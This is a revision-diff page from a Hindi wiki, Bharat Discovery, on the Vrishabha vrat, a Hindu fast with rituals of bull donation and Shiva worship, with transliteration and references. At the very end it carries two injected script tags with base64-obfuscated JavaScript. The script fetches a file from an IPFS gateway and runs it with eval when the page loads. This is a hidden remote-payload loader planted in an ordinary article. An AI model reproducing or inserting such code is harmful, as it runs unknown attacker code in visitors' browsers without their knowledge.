Difference between revisions of "वृषभ व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[शुक्ल पक्ष]] की [[सप्तमी]] पर वृषभव्रत रखा जाता है।
 
*[[शुक्ल पक्ष]] की [[सप्तमी]] पर वृषभव्रत रखा जाता है।
 
*श्वेत वस्त्रों से आवृत तथा घंटी आदि आभूषणों से अलंकृत बैल का दान करना चाहिए।
 
*श्वेत वस्त्रों से आवृत तथा घंटी आदि आभूषणों से अलंकृत बैल का दान करना चाहिए।
Line 7: Line 7:
 
*काठ के बने बैलों को (एक दिन पूर्व ही) घर में स्थापित करना और [[गंध]] आदि से पूजा करनी चाहिए।
 
*काठ के बने बैलों को (एक दिन पूर्व ही) घर में स्थापित करना और [[गंध]] आदि से पूजा करनी चाहिए।
 
*[[धर्म]] कहकर उनकी प्रार्थना करनी चाहिए।  
 
*[[धर्म]] कहकर उनकी प्रार्थना करनी चाहिए।  
*धर्म को बहुधा वृष कहा गया है। <ref>(मनु 8|16, शान्तिपर्व 90|15)</ref>
+
*धर्म को बहुधा वृष कहा गया है।<ref>मनु 8|16, [[शान्ति पर्व महाभारत|शान्ति पर्व]] 90|15</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shukl paksh ki saptami par vrishabhavrat rakha jata hai.
  • shvet vastroan se avrit tatha ghanti adi abhooshanoan se alankrit bail ka dan karana chahie.
  • vrishabhavrat tithivrat; shiv devata ki pooja karani chahie.
  • aisi manyata hai ki vrishabhavrat se shiv lok ki prapti aur raja ho jata hai.[1]
  • jyeshth amavasya par bailoan ki pooja karani chahie.
  • kath ke bane bailoan ko (ek din poorv hi) ghar mean sthapit karana aur gandh adi se pooja karani chahie.
  • dharm kahakar unaki prarthana karani chahie.
  • dharm ko bahudha vrish kaha gaya hai.[2]

tika tippani aur sandarbh

  1. hemadri vrat khand 1, 882, bhavishyottarapuran se uddharan
  2. manu 8|16, shanti parv 90|15

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>